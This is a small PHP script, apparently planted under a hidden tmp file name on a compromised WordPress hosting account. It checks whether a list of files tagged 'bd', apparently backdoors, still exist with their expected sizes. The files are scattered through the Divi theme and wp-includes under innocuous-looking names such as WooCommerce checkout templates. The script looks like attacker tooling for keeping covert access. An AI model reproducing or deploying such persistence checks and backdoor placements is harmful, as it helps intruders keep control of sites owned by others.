File: /home/imperialpark/.cagefs/tmp/.symbol
<?php $r = '/home/imperialpark/public_html'; $x = ["/wp-content/themes/Divi/includes/builder/feature/gutenberg/utils/database.php"=>"bd@@286988@@996",
"/wp-content/themes/Divi/includes/builder/post/query/load.php"=>"bd@@286989@@991",
"/wp-content/themes/Divi/includes/builder/tests/codeception/wpunit/pms.php"=>"bd@@312203@@976",
"/wp-includes/publicjmk/fputs_xor_ascii.php"=>"bd@@264596@@6335",
"/wp-includes/publicjmk/fputs_enc_phar_cm.php"=>"bd@@264598@@6063",
"/wp-content/themes/Divi/includes/builder/feature/woocommerce/templates/global/form.login.php"=>"bd@@282073@@976",
"/wp-content/themes/Divi/includes/builder/feature/woocommerce/templates/checkout/payment.order.php"=>"bd@@277033@@1070",
"/wp-content/themes/Divi/includes/builder/frontend-builder/theme-builder/post/query/StripWhitespace.php"=>"bd@@282039@@1060"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');